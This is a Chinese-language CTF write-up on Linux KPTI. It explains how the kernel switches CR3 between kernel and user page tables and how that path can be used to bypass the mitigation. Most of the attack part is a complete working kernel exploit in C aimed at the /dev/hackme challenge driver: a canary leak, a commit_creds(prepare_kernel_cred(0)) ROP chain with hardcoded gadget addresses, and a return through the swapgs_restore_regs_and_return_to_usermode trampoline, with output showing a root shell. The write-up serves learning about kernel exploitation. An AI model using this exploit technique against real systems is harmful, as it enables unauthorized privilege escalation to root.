KPTI
KPTI描述内容摘录自ctf wiki
KPTI 机制最初的主要目的是为了缓解 KASLR 的绕过以及 CPU 侧信道攻击。
在 KPTI 机制中,内核态空间的内存和用户态空间的内存的隔离进一步得到了增强。
内核态中的页表包括用户空间内存的页表和内核空间内存的页表。
用户态的页表只包括用户空间内存的页表以及必要的内核空间内存的页表,如用于处理系统调用、中断等信息的内存。
在 x86_64 的 PTI 机制中,内核态的用户空间内存映射部分被全部标记为不可执行。也就是说,之前不具有 SMEP 特性的硬件,如果开启了 KPTI 保护,也具有了类似于 SMEP 的特性。此外,SMAP 模拟也可以以类似的方式引入,只是现在还没有引入。因此,在目前开启了 KPTI 保护的内核中,如果没有开启 SMAP 保护,那么内核仍然可以访问用户态空间的内存,只是不能跳转到用户态空间执行 Shellcode。
Linux 4.15 中引入了 KPTI 机制,并且该机制被反向移植到了 Linux 4.14.11,4.9.75,4.4.110。
内核如何从内核态页面切换到用户态页面
通过SWITCH_TO_USER_CR3_STACK
宏实现从内核态页面
切换到用户态页面
SWITCH_TO_USER_CR3_STACK宏 实现原理
.macro SWITCH_TO_USER_CR3_STACK scratch_reg:reqpushq %raxSWITCH_TO_USER_CR3_NOSTACK scratch_reg=\scratch_reg scratch_reg2=%raxpopq %rax
.endm.macro SWITCH_TO_USER_CR3_NOSTACK scratch_reg:req scratch_reg2:reqALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTImov %cr3, \scratch_regALTERNATIVE "jmp .Lwrcr3_\@", "", X86_FEATURE_PCID/** Test if the ASID needs a flush.*/movq \scratch_reg, \scratch_reg2andq $(0x7FF), \scratch_reg /* mask ASID */bt \scratch_reg, THIS_CPU_user_pcid_flush_maskjnc .Lnoflush_\@/* Flush needed, clear the bit */btr \scratch_reg, THIS_CPU_user_pcid_flush_maskmovq \scratch_reg2, \scratch_regjmp .Lwrcr3_pcid_\@.Lnoflush_\@:movq \scratch_reg2, \scratch_regSET_NOFLUSH_BIT \scratch_reg.Lwrcr3_pcid_\@:/* Flip the ASID to the user version */orq $(PTI_USER_PCID_MASK), \scratch_reg.Lwrcr3_\@:/* Flip the PGD to the user version */orq $(PTI_USER_PGTABLE_MASK), \scratch_regmov \scratch_reg, %cr3
.Lend_\@:
.endm
引用自arttnba3
众所周知 Linux 采用四级页表结构(PGD->PUD->PMD->PTE),而 CR3 控制寄存器用以存储当前的 PGD 的地址,因此在开启 KPTI 的情况下用户态与内核态之间的切换便涉及到 CR3 的切换,为了提高切换的速度,内核将内核空间的 PGD 与用户空间的 PGD 两张页全局目录表放在一段连续的内存中(两张表,一张一页4k,总计8k,内核空间的在低地址,用户空间的在高地址),这样只需要将 CR3 的第 13 位取反便能完成页表切换的操作
SWITCH_TO_USER_CR3_STACK宏 在哪些地方使用
在系统调用、中断处理处使用(都需要从内核态切换到用户态),如下是省略的系统调用entry_SYSCALL_64
代码
SYM_CODE_START(entry_SYSCALL_64)UNWIND_HINT_EMPTYswapgs[...]cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<movq R11(%rsp), %r11cmpq %r11, EFLAGS(%rsp) /* R11 == RFLAGS */jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<</* nothing to check for RSP */cmpq $__USER_DS, SS(%rsp) /* SS must match SYSRET */jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<[...]SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< 通过这个宏 从内核态页面切换到用户态页面popq %rdipopq %rspUSERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
从代码可知,在系统调用结束,返回到用户态之前会调用SWITCH_TO_USER_CR3_STACK
切换页面
之后再调用如下指令返回到用户态
popq %rdipopq %rspUSERGS_SYSRET64#define USERGS_SYSRET64 \swapgs; \sysretq;
利用 SWITCH_TO_USER_CR3_STACK宏 绕过 KPTI
由于SWITCH_TO_USER_CR3_STACK
是宏,在/proc/kallsyms
中不存在其符号地址,因此一般是先获取使用到该宏的函数地址,再加上SWITCH_TO_USER_CR3_STACK展开处的偏移作为rop的地址,进行利用
通过entry_SYSCALL_64中的SWITCH_TO_USER_CR3_STACK绕过KPTI
- 先找到
entry_SYSCALL_64
的地址,再通过反汇编工具找到entry_SYSCALL_64
中SWITCH_TO_USER_CR3_STACK
展开开始处的地址,将该地址作为rop的一环 - 由于在
entry_SYSCALL_64
内部利用SWITCH_TO_USER_CR3_STACK
,会自动执行到swapgs; sysretq
,需要在rop链中构造sysretq
切换到用户态是需要的内核栈- 设置rcx为用户态rip,设置r11为用户态rflags,设置rsp为一个用户态堆栈
通过swapgs_restore_regs_and_return_to_usermode(trampoline) 绕过 KPTI
再看看entry_SYSCALL_64
的代码
SYM_CODE_START(entry_SYSCALL_64)UNWIND_HINT_EMPTYswapgs[...]cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */
[1] jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<movq R11(%rsp), %r11cmpq %r11, EFLAGS(%rsp) /* R11 == RFLAGS */
[1] jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<</* nothing to check for RSP */cmpq $__USER_DS, SS(%rsp) /* SS must match SYSRET */
[1] jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<[...]
[2] SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< 通过这个宏 从内核态页面切换到用户态页面popq %rdipopq %rspUSERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
如果系统调用不出什么意外,是通过【2】处的代码从内核态页面切换到用户态页面
在执行检测不符合检测时,是通过swapgs_restore_regs_and_return_to_usermode
函数返回到用户态:其中包含了页面切换,swapgs,iretq
SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
#ifdef CONFIG_DEBUG_ENTRY/* Assert that pt_regs indicates user mode. */testb $3, CS(%rsp)jnz 1fud2
1:
#endifPOP_REGS pop_rdi=0/** The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.* Save old stack pointer and switch to trampoline stack.*/movq %rsp, %rdimovq PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rspUNWIND_HINT_EMPTY/* Copy the IRET frame to the trampoline stack. */pushq 6*8(%rdi) /* SS */pushq 5*8(%rdi) /* RSP */pushq 4*8(%rdi) /* EFLAGS */pushq 3*8(%rdi) /* CS */pushq 2*8(%rdi) /* RIP *//* Push user RDI on the trampoline stack. */pushq (%rdi)/** We are on the trampoline stack. All regs except RDI are live.* We can do future final exit work right here.*/STACKLEAK_ERASE_NOCLOBBERSWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< 通过这个宏 从内核态页面切换到用户态页面/* Restore RDI. */popq %rdiSWAPGSINTERRUPT_RETURN // <<<<<<<<<<<<<<<<<<<< iretq#define INTERRUPT_RETURN iretq
大佬们说,通过反汇编才能看到细节
先找到swapgs_restore_regs_and_return_to_usermode的地址
/ # cat /proc/kallsyms | grep "swapgs_restore_regs_and_return_to_usermode"
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
.text:FFFFFFFF81200F10
.text:FFFFFFFF81200F10 pop r15 【1】<< swapgs_restore_regs_and_return_to_usermode起始位置
.text:FFFFFFFF81200F12 pop r14
.text:FFFFFFFF81200F14 pop r13
.text:FFFFFFFF81200F16 pop r12
.text:FFFFFFFF81200F18 pop rbp
.text:FFFFFFFF81200F19 pop rbx
.text:FFFFFFFF81200F1A pop r11
.text:FFFFFFFF81200F1C pop r10
.text:FFFFFFFF81200F1E pop r9
.text:FFFFFFFF81200F20 pop r8
.text:FFFFFFFF81200F22 pop rax
.text:FFFFFFFF81200F23 pop rcx
.text:FFFFFFFF81200F24 pop rdx
.text:FFFFFFFF81200F25 pop rsi
.text:FFFFFFFF81200F26 mov rdi, rsp 【2】<< 由于pop较多,会增加rop的长度,一般从这里利用,距离起始位置22
.text:FFFFFFFF81200F29 mov rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32 push qword ptr [rdi+30h]
.text:FFFFFFFF81200F35 push qword ptr [rdi+28h]
.text:FFFFFFFF81200F38 push qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B push qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E push qword ptr [rdi+10h]
.text:FFFFFFFF81200F41 push qword ptr [rdi]
.text:FFFFFFFF81200F43 push rax
.text:FFFFFFFF81200F44 jmp short loc_FFFFFFFF81200F89 【3】
[...]
[...]
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89 pop rax 【3】还需要弹出两个内容
.text:FFFFFFFF81200F8A pop rdi
.text:FFFFFFFF81200F8B call cs:off_FFFFFFFF82040088 【4】swapgs
.text:FFFFFFFF81200F91 jmp cs:off_FFFFFFFF82040080 【5】iretq
- FFFFFFFF81200F10 【1】 swapgs_restore_regs_and_return_to_usermode起始位置
- FFFFFFFF81200F26 【2】由于pop较多,会增加rop的长度,一般从这里利用,距离起始位置22
- FFFFFFFF81200F44 【3】还需要弹出两个内容
- FFFFFFFF81200F8B 【4】swapgs
- FFFFFFFF81200F91 【5】iretq
因此rop在布局为
pop rdi; ret;
0
prepare_kernel_cred
mov rdi, rax; ret;
commit_creds
swapgs_restore_regs_and_return_to_usermode + 22
0
0
user_rip
user_cs
user_rflags
user_sp
user_ss
由于iretq
返回到用户态时内核栈布局比sysretq
简单,一般是使用swapgs_restore_regs_and_return_to_usermode
绕过KPTI
题目解
启用kpit
#!/bin/sh
qemu-system-x86_64 \-m 1024M \-cpu kvm64,+smep,+smap \-kernel vmlinuz \-initrd initramfs.cpio.gz \-hdb flag.txt \-snapshot \-nographic \-monitor /dev/null \-no-reboot \-append "console=ttyS0 nokaslr quiet panic=1"
先执行绕过smep的exp,段错误
/ $ ./04_exploit_bypass_smep
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x7ae17b2ee0e55b00 @ index 16
[*] saving user land state
[*] trying to overwrite return address with ROP chain
Segmentation fault
/ $
将exp中的rop修改为如下内容
payload[cookie_off++] = cookie;payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = pop_rdi_ret; // return addresspayload[cookie_off++] = 0x0;payload[cookie_off++] = prepare_kernel_cred;payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1_ret;payload[cookie_off++] = 0x0;payload[cookie_off++] = commit_creds;payload[cookie_off++] = swapgs_restore_regs_and_return_to_usermode + 22; // 开始时有很多无用的pop指令,我们只需要回到那些pop指令之后的偏移量payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = user_rip;payload[cookie_off++] = user_cs;payload[cookie_off++] = user_rflags;payload[cookie_off++] = user_sp;payload[cookie_off++] = user_ss;
结果如下
/ $ ./05_exploit_bypass_kpti_with_trampoline
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x25ed2c3e73fecd00 @ index 16
[*] saving user land state
[*] trying to run ROP chain and bypass KPTI with trampoline
[+] returned to user land
[+] got root (uid = 0)
[*] spawning shell
/ # id
uid=0 gid=0
完整exp
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>char *VULN_DRV = "/dev/hackme";
void spawn_shell();int64_t global_fd = 0;
uint64_t cookie = 0;
uint8_t cookie_off = 16;uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t user_rip = (uint64_t) spawn_shell;
uint64_t prepare_kernel_cred = 0xffffffff814c67f0;
uint64_t commit_creds = 0xffffffff814c6410;
uint64_t pop_rdi_ret = 0xffffffff815f88ec;
uint64_t mov_rdi_rax_clobber_rsi140_pop1_ret = 0xffffffff816bf203;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81200f10;void open_dev() {global_fd = open(VULN_DRV, O_RDWR);if (global_fd < 0) {printf("[!] failed to open %s\n", VULN_DRV);exit(-1);} else {printf("[+] successfully opened %s\n", VULN_DRV);}
}void leak_cookie() {uint8_t sz = 40;uint64_t leak[sz];printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));uint64_t data = read(global_fd, leak, sizeof(leak));cookie = leak[cookie_off];printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);if(!cookie) {puts("[-] failed to leak stack canary!");exit(-1);}
}void spawn_shell() {puts("[+] returned to user land");uid_t uid = getuid();if (uid == 0) {printf("[+] got root (uid = %d)\n", uid);} else {printf("[!] failed to get root (uid: %d)\n", uid);exit(-1);}puts("[*] spawning shell");system("/bin/sh");exit(0);
}void save_userland_state() {puts("[*] saving user land state");__asm__(".intel_syntax noprefix;""mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;"".att_syntax");
}void overwrite_ret() {puts("[*] trying to run ROP chain and bypass KPTI with trampoline");uint8_t sz = 35;uint64_t payload[sz];payload[cookie_off++] = cookie;payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = pop_rdi_ret; // return addresspayload[cookie_off++] = 0x0;payload[cookie_off++] = prepare_kernel_cred;payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1_ret;payload[cookie_off++] = 0x0;payload[cookie_off++] = commit_creds;payload[cookie_off++] = swapgs_restore_regs_and_return_to_usermode + 22; // 开始时有很多无用的pop指令,我们只需要回到那些pop指令之后的偏移量payload[cookie_off++] = 0x0;payload[cookie_off++] = 0x0;payload[cookie_off++] = user_rip;payload[cookie_off++] = user_cs;payload[cookie_off++] = user_rflags;payload[cookie_off++] = user_sp;payload[cookie_off++] = user_ss;uint64_t data = write(global_fd, payload, sizeof(payload));puts("[-] if you can read this we failed the mission :(");
}int main(int argc, char **argv) {open_dev();leak_cookie();save_userland_state();overwrite_ret();return 0;
}
参考
https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development/kernel-page-table-isolation-kpti
https://github.com/torvalds/linux/blob/7587a4a5a4f66293e13358285bcbc90cc9bddb31/arch/x86/entry/entry_64.S#L575
https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/kpti/#switch_to_user_cr3_stack
https://github.com/pr0cf5/kernel-exploit-practice/tree/master/bypass-smep#bypassing-smepkpti-via-rop
https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#version-1-trampoline-goes-weeeh